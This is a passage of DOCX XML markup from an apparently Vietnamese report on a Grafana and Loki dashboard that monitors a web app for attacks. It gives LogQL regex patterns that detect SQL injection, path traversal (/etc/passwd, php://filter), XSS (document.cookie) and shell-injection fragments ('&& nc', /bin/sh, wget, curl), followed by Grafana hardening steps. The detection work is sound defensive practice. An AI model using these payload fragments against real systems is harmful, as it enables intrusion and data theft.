        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trực quan hóa toàn bộ chuỗi lỗi nghiệp vụ PHP, nguyên nhân gốc, tên file, số dòng và Stack Trace khi ứng dụng phát sinh lỗi.</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Panel 2 — Phát hiện tấn công tiêm mã SQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lọc vết các truy vấn chứa payload tấn công cơ sở dữ liệu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>SLEEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>extractvalue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>into outfile</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Panel 3 — Dò quét tệp tin hệ thống và duyệt thư mục trái phép:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt các hành vi dò tìm tệp hệ thống (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>win.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php://filter</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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Panel 4 — Tấn công chèn mã kịch bản độc hại XSS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhận diện các thẻ kịch bản độc hại và sự kiện JavaScript (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>onerror=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>onload=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>document.cookie</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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Panel 5 — Thực thi lệnh từ xa và chèn lệnh shell:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt các ký tự ghép lệnh shell Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>; cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>| whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>&amp;&amp; nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/bin/sh</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6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Panel 6 — Giám sát mã lỗi máy chủ và rò rỉ dữ liệu:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Giám sát lưu lượng lỗi HTTP 404, 500, 503 và các thông báo lỗi cơ sở dữ liệu bị rò rỉ ra phía người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Panel 7 — Tốc độ sự cố an ninh đa chiều theo thời gian:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Biểu đồ chuỗi thời gian phân tầng mức độ nghiêm trọng của các vector tấn công theo thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Panel 8 — Chẩn đoán hoạt động cơ sở dữ liệu MariaDB:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Theo dõi nhật ký hoạt động nội bộ và chẩn đoán truy vấn của container cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H4"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Bảng đặc tả chi tiết câu lệnh truy vấn LogQL và mẫu Regex của 8 phân vùng giám sát</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Panel</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Tên phân vùng giám sát</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Dạng trực quan</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Mục tiêu giám sát</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Câu lệnh truy vấn LogQL và biểu thức chính quy (Regex)</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P1</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Ngoại lệ &amp; Vết ngăn xếp ứng dụng</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Phát hiện lỗi thời gian chạy, lỗi cú pháp hoặc ngoại lệ CSDL nội bộ</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{container="ilfreight_web"} |~ "(?i)(APP-EXCEPTION|cause_chain|database_query_failure|Fatal error|Uncaught Exception|mysqli_sql_exception)"</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P2</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Tấn công tiêm mã SQL (SQLi)</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Bắt các đợt tiêm mã khai thác CSDL qua tham số HTTP</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{container="ilfreight_web"} |~ "(?i)(union(\s+|%20|\+)select|sleep\(|benchmark\(|or(\s+|%20|\+)1=1|--|load_file\(|into(\s+|%20|\+)outfile|into(\s+|%20|\+)dumpfile|information_schema|database\(|schema\(|sqlmap|havij)"</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P3</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Duyệt thư mục &amp; Đọc tệp trái phép (LFI/RFI)</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Phát hiện hành vi dò quét file nhạy cảm (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, wrapper </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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{container="ilfreight_web"} |~ "(?i)(\.\./|\.\.\|%2e%2e%2f|%2e%2e/|\.\.%2f|%2e%2e%5c|/etc/passwd|/etc/shadow|/proc/self|win\.ini|boot\.ini|system32|php://filter|php://input|data://)"</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P4</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Chèn mã kịch bản độc hại (XSS)</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Nhận diện thẻ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, mã HTML độc và hành vi đánh cắp cookie</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{container="ilfreight_web"} |~ "(?i)(&lt;script|%3cscript|&lt;/script|%3c/script|&lt;svg|%3csvg|&lt;iframe|%3ciframe|&lt;img|%3cimg|javascript:|vbscript:|onload=|onerror=|onclick=|onmouseover=|alert\(|prompt\(|confirm\(|document\.cookie)"</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P5</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Thực thi lệnh từ xa &amp; Chèn lệnh OS (CMDi)</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Bắt các ký tự ghép lệnh shell (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</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{container="ilfreight_web"} |~ "(?i)(;\s*(cat|ls|id|whoami|pwd|uname|nc|sh|bash)|\s*|\s*(cat|ls|id|whoami|sh|bash)|&amp;&amp;\s*(cat|ls|id|whoami)|/bin/sh|/bin/bash|powershell|cmd\.exe|wget(\s+|%20|\+)|curl(\s+|%20|\+))"</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P6</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Rò rỉ thông báo lỗi &amp; Mã phản hồi 4xx/5xx</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Phát hiện sập server 500 hoặc cú pháp SQL bị phơi bày ra phía client</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{container="ilfreight_web"} |~ "(?i)(syntax\s+error|database_query_failure|mysqli_error|SQL\s+Error|"status":50[0-9]|"status":40[0-9]| 500 | 404 )"</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P7</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Tốc độ sự cố an ninh đa chiều (Events/s)</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Time Series Chart</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Biểu đồ đo lường tần suất các vụ tấn công theo từng nhóm nguy cơ</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sz w:val="21"/>
              </w:rPr>
              <w:t>SQLi:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sum(rate({container="ilfreight_web"} |~ "(?i)(union.*select|sleep\(|benchmark\(|information_schema)"[1m]))</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>LFI:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sum(rate({container="ilfreight_web"} |~ "(?i)(\.\./|/etc/passwd|php://)"[1m]))</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>XSS:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sum(rate({container="ilfreight_web"} |~ "(?i)(&lt;script|&lt;svg|onerror=)"[1m]))</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lỗi 5xx:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sum(rate({container="ilfreight_web"} |~ "(?i)("status":50[0-9]| 500 )"[1m]))</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P8</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Chẩn đoán hoạt động cơ sở dữ liệu MariaDB</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Theo dõi nhật ký kết nối, khóa bảng và hiệu năng truy vấn MariaDB</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{container="ilfreight_db"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2.3. Thắt chặt an ninh cho bảng điều khiển Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Do bảng điều khiển chứa toàn bộ nhật ký ứng dụng nhạy cảm (thông tin truy vấn cơ sở dữ liệu, địa chỉ IP máy khách, dấu vết payload và tài khoản người dùng), việc bảo vệ cổng giám sát là yêu cầu an ninh tối thượng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tắt quyền xem không cần đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GF_AUTH_ANONYMOUS_ENABLED=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.monitoring.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Mọi yêu cầu truy cập giao diện web đều bắt buộc phải vượt qua bước xác thực tài khoản quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đặt mật khẩu quản trị ngẫu nhiên có độ phức tạp cao:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thay thế hoàn toàn mật khẩu mặc định bằng chuỗi ký tự ngẫu nhiên có độ dài 24 ký tự có độ phức tạp cao, triệt tiêu nguy cơ tấn công brute-force hoặc chiếm quyền thông qua tài khoản mặc định.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
